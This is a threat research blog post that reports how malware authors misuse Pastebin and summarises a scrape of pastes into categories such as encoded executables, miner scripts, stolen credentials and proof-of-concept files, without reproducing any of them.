FortiGuard Labs Threat Research

The Malicious Use of Pastebin

By Amir Zali | August 02, 2019

FortiGuard Labs Threat Research Report

The FortiGuard Labs threat research team has been noticing for some time that Pastebin and similar services are being used by malware authors, sometimes to evade detection or to obscure their purposes. However, we had no idea how common this practice is or what sorts of malicious content might be stored there. To get to the bottom of this, I decided to scrape Pastebin myself to see what is going on.

What is Pastebin, and How Do Bad Actors Use It?

Tools like Pastebin can be used to share plain-text data over the internet with just a link. But not everyone uses this service in the same way or for innocent purposes. Malware authors, for example, often use Pastebin, or services like it, to store part of the malicious content from their malware, and then fetch it later from inside the malicious executable using the share link. A recent FortiGuard Labs blog on the Rocke coin mining malware shows one practical use case for this practice.

Malicious Uses for Pastebin

To take a closer look at this practice, and see how prevalent the misuse of this service is by cyber criminals, I decided to scrape all the pastes in Pastebin and process them for malicious content. At first, my goal was to look up malicious files, since Pastebin can be used as an evasion technique. However, what I discovered was a wide variety of malicious scripts, stolen credentials, encoded content, and malware. The result of this research, based on examining thousands of pastes, is as follows.

Base64 Encoded Content: Over 8,000 of these files fell into this category. Among them were obfuscated scripts, some hashes, and countless binary data. Surprisingly, I also found some ELF/PE executable files. Listed below is the MD5 hash of a few of these files and their status on VirusTotal.

Bash Script Files: Another approximately 1,000 files were bash script files. Most of the files were cryptocurrency miners and scripts used to install services. Otherwise, I couldn’t detect anything special about them using my filtering scripts.

Credentials and Sensitive Information: Over 6,000 of these files claimed to include stolen and hacked usernames and passwords for a variety of services, such as Spotify and Netflix, as well as some credit card information.

Encoded Content: Over 4,000 pastes were either encoded/random text strings, contained encryption keys, public and private cryptocurrency keys and wallets, a number of PHP or JavaScript obfuscated scripts, authentication tokens hardcoded in script files, onion service links (addresses in the Tor network), and last but not least, a lot of links for cracked software and/or movies (copyright protected content).   

Source Files: 3,000 of these pastes included source files in PowerShell scripts, Python, JavaScript, etc. Among those, I was able to detect PoC files related to public vulnerabilities.

Pastebin is Just the Tip of the Iceberg

I only checked the Pastebin service for malicious files, but there are a number of similar services that cyber criminals may use in this way. However, some of them don’t index posted entries so they are not easy to scrape. Because of this, they may be even more interesting to cyber criminals – which also means the content on these other services may be even more interesting to cybersecurity professionals as well.

Learn more about FortiGuard Labs threat research and the FortiGuard Security Subscriptions and Services portfolio.

Learn more about Fortinet’s free cybersecurity training initiative or about the Fortinet NSE Training programSecurity Academy program, and Veterans program.